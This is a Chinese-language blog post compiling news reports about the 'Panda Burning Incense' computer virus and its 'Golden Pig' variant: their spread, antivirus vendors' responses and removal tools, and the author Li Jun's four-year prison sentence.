专家介绍,“熊猫烧香”去年11月中旬被首次发现,短短两个月时间,新老变种已达700多种个,据江民反病毒预警中心监测到的数据显示,“熊猫烧香”病毒去年12月一举闯入病毒排名前20名,1月份更是有望进入前10名。疫情最严重的地区分别为:广东、山东、江苏、北京和辽宁。

针对该病毒,江民杀毒软件KV系列已紧急升级,用户升级到最新病毒库即可有效防范该病毒于系统之外。江民“熊猫烧香”专杀工具已同步更新,未安装杀毒软件的用户可以登陆江民网站下载杀毒。此外,针对“熊猫烧香”变种频繁的特征,江民杀毒软件KV2007主动防御规则库可彻底防范“熊猫烧香”及其变种,用户可以登陆江民反病毒论坛(forum.jiangmin.com)下载使用。

金山毒霸反病毒专家戴光剑指出,伴随着各大杀毒厂商对“熊猫烧香”病毒的集中绞杀,该病毒正在不断“繁衍”新的变种,密谋更加隐蔽的传播方式。据不完全统计,仅12月份至今,变种数已达90多个,个人用户感染熊猫烧香的已经高达几百万,企业用户感染数还在继续上升。

此外学生寒假开始,上网人群短期内集中上升,病毒的传播速度也空前加快,所以用户在进行上网的过程中要更加警惕病毒的入侵。据了解,前几天在网络上出现了 “熊猫烧香”作者声称不再有变种出现,而“金猪”的出现再次粉碎了人们的美梦,再次将人们拉回到熊猫烧香的梦魇之中。专家称,按照目前“熊猫烧香”破坏程度,威胁将延伸至春节。

专家提醒大家,遇到“金猪”不要心慌,用熊猫烧香专杀工具就可以完全对付这只小金猪啦!

熊猫烧香变身“金猪报喜”再作乱

由于“熊猫烧香”病毒作者不断更新变种程序,众多杀毒软件无法跟随病毒的发展速度。
“熊猫烧香”余毒未尽,新变种接踵而来。据悉,熊猫烧香已改头换面变成新病毒“金猪报喜”。日前,江民、瑞星、金山等反病毒公司已经陆续截获大量“金猪报喜”病毒的报告,而这一病毒甚至可以清除用户机器里原有的“熊猫烧香”病毒,并自动取而代之。

由于“熊猫烧香”病毒作者不断更新变种程序,众多杀毒软件无法跟随病毒的发展速度。而近日出现的“金猪报喜”病毒图表,同样是可爱的小动物,但危害却在与“熊猫烧香”一样感染EXE文件外,还能感染RAR跟ZIP等格式文件。据悉目前几家反病毒厂商尚未推出针对“金猪报喜”的专杀工具。

由于春节临近,更多新 病毒可能集中出现,因此反病毒专家提醒用户要加强警惕,及时升级 杀毒软件,不要随便点击莫名来历文件。

最虔诚的病毒–熊猫烧香
对于这个在06年给人们带来黑色记忆的病毒,其成因只因为作者为了炫耀自己而产生,其借助U盘的传播方式也引领新的反病毒课题,但这一切都没有其 LOGO的熊猫给人的印象深刻,熊猫拿着三根香虔诚的祈祷什么?这给很多人以遐想。所以最虔诚的病毒只能颁给举着香在祈祷的熊猫。

9月24日,“熊猫烧香”案一审宣判,主犯李俊被判刑4年。庭审中,李俊的辩护律师王万雄出示了一份某网络公司发给李俊的邀请函,请他担任公司的技术总监。据悉,案发后已有不下10家网络大公司跟李俊联系,欲以100万年薪邀请其加入(见9月25日《长江商报》)。
熊猫烧香传播性极高,中病毒者会在短时间内传染局域网内其他用户!

如果觉得我的文章对您有用,请随意打赏。您的支持将鼓励我继续创作!

发表评论

电子邮件地址不会被公开。 必填项已用*标注

标签云